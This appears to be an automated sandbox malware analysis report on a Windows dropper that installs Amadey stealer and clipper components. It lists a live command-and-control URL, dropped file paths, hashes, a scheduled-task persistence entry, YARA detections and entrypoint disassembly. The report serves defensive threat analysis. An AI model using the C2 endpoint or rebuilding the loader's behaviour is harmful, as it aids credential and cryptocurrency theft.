Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, login.live.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, config.edge.skype.com, www-www.bing.com.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:57:03	Task Scheduler	Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
19:57:03	API Interceptor	2455x Sleep call for process: mnolyk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
62.204.41.4	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TNNET-ASTNNetOyMainnetworkFI	file.exe	Get hash	malicious	Browse	62.204.41.134
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	Rg7BWLbTVs.exe	Get hash	malicious	Browse	62.204.41.134
	y7bGEK2e4Y.exe	Get hash	malicious	Browse	62.204.41.5
	MZtij6SN87.exe	Get hash	malicious	Browse	62.204.41.5
	9sJ5F2RAvY.exe	Get hash	malicious	Browse	62.204.41.5
	xakJ7het39.exe	Get hash	malicious	Browse	62.204.41.134
	ePaQLI5RyP.exe	Get hash	malicious	Browse	62.204.41.7
	z3tYlqYItl.exe	Get hash	malicious	Browse	62.204.41.7
	jGQGty5EA2.exe	Get hash	malicious	Browse	62.204.41.7
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nika.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aKuf.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	346112
Entropy (8bit):	7.6398500912394285
Encrypted:	false
SSDEEP:	6144:KGy+bnr+up0yN90QETK5opQV2ZCrf5aFld9BY4w8HJuJk:KMrWy90NQwYoPzBc4JuJk
MD5:	E2A785D0666AFD7BBE63FAF32216A8AA
SHA1:	CCE1A094E4CE3F073D2CF9693C20503534D3C4F4
SHA-256:	51380BA1A929713AA9C1BE04FF7BCBB2782E51BA0689B6F86E91BBF41D81811B
SHA-512:	EF9C4F63013AC69B8D9A875B17D9A7FC8EC4DC2E6608390804A83A160D5AF0DD5AAA9AB7638B10EBFE53AA5FDC7BDA346791A2A15F497B2CD486E4224DB93D0D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................K.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	7.317039374404058
Encrypted:	false
SSDEEP:	6144:Dr0exvHrDLnQ1ik5HXrwCO5vFkb3NUmv30:Dr0ujDLoiYkxvFkDNUmv
MD5:	CCFC1E2539F9382400217DF5AE6D1D8A
SHA1:	A0F83E7D1B3C7C00B387F7963B1E01AF756E7D50
SHA-256:	0D29057FDCACDD5442EC9C8901BDC7C36B69E10B0D8248C8534E0A3A4142C8F5
SHA-512:	35CD1A17BA1FE5A5E934934D6C0FCBEC06D30E5EB584E089E6AF568175B4DD16E6A1CE0B3F2C9C53D36C7867D1D544259050D92D4C036FD40937AB569DAA4D5F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L......a............................_r............@.................................:.......................................\...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.621829903792328
Encrypted:	false
SSDEEP:	3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
MD5:	1B7C22A214949975556626D7217E9A39
SHA1:	D01C97E2944166ED23E47E4A62FF471AB8FA031F
SHA-256:	340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
SHA-512:	BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
Malicious:	false
Preview:	<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.809742458927501
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	537600
MD5:	b16d53f153404f5825765f11ab2b6827
SHA1:	cc5d6001624f836f5aa82e0178c6c2dc2fdac2c4
SHA256:	128da440dc3448874960fb1eb8d34c283ba78f6517e20b57f2faa158d84a3fd0
SHA512:	775b43cadf18aaa5319faded84739c974580d075edf96ab38156fdb2431f6d339bc6d85871e3ca574b30be22eac0c74804e3eb55654356835491577d635776b9
SSDEEP:	12288:ZMrVy90wNpxJPhsvwmGAPzBU4NuJ+AlVH3Md1v:YyxNpxJ2LbBNNuJ+uVH30J
TLSH:	E7B4024BE7EC8032D9B117B059F202C31536BE905B38939B229EAC5F58736A4E53177B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Entrypoint Preview

Instruction
call 00007FB39CC17105h
jmp 00007FB39CC16A15h
push 00000058h
push 004072B8h
call 00007FB39CC171A7h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007FB39CC16A2Ah
cmp eax, esi
jne 00007FB39CC16A19h
xor esi, esi
inc esi
mov edi, esi
jmp 00007FB39CC16A22h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007FB39CC169E9h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007FB39CC16A1Ch
push 0000001Fh
call 00007FB39CC16F3Bh
pop ecx
jmp 00007FB39CC16A4Ch
cmp dword ptr [004088B0h], ebx
jne 00007FB39CC16A3Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007FB39CC16B66h
pop ecx
pop ecx
test eax, eax
je 00007FB39CC16A29h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007FB39CC16B49h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007FB39CC16A2Dh
push 004010B4h
push 004010ACh
call 00007FB39CC170F5h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x7ad9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x87000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x7b000	0x7ae00	False	0.9247679298067142	data	7.854212666782187	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x87000	0x888	0xa00	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xcb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf94c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0xffb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x1029c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States
RT_ICON	0x10484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_ICON	0x105ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x11454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x11cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x123c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x1292c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x20300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x228a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x23950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x242d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x24740	0x2f2	data	English	United States
RT_DIALOG	0x24a34	0x35c	data	Russian	Russia
RT_DIALOG	0x24d90	0x1b0	data	English	United States
RT_DIALOG	0x24f40	0x1b4	data	Russian	Russia
RT_DIALOG	0x250f4	0x166	data	English	United States
RT_DIALOG	0x2525c	0x168	data	Russian	Russia
RT_DIALOG	0x253c4	0x1c0	data	English	United States
RT_DIALOG	0x25584	0x1e0	data	Russian	Russia
RT_DIALOG	0x25764	0x130	data	English	United States
RT_DIALOG	0x25894	0x150	data	Russian	Russia
RT_DIALOG	0x259e4	0x120	data	English	United States
RT_DIALOG	0x25b04	0x122	data	Russian	Russia
RT_STRING	0x25c28	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States
RT_STRING	0x25cb4	0x86	Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0	Russian	Russia
RT_STRING	0x25d3c	0x520	data	English	United States
RT_STRING	0x2625c	0x52e	data	Russian	Russia
RT_STRING	0x2678c	0x5cc	data	English	United States
RT_STRING	0x26d58	0x592	data	Russian	Russia
RT_STRING	0x272ec	0x4b0	data	English	United States
RT_STRING	0x2779c	0x4b2	data	Russian	Russia
RT_STRING	0x27c50	0x44a	data	English	United States
RT_STRING	0x2809c	0x43e	data	Russian	Russia
RT_STRING	0x284dc	0x3ce	data	English	United States
RT_STRING	0x288ac	0x2fc	data	Russian	Russia
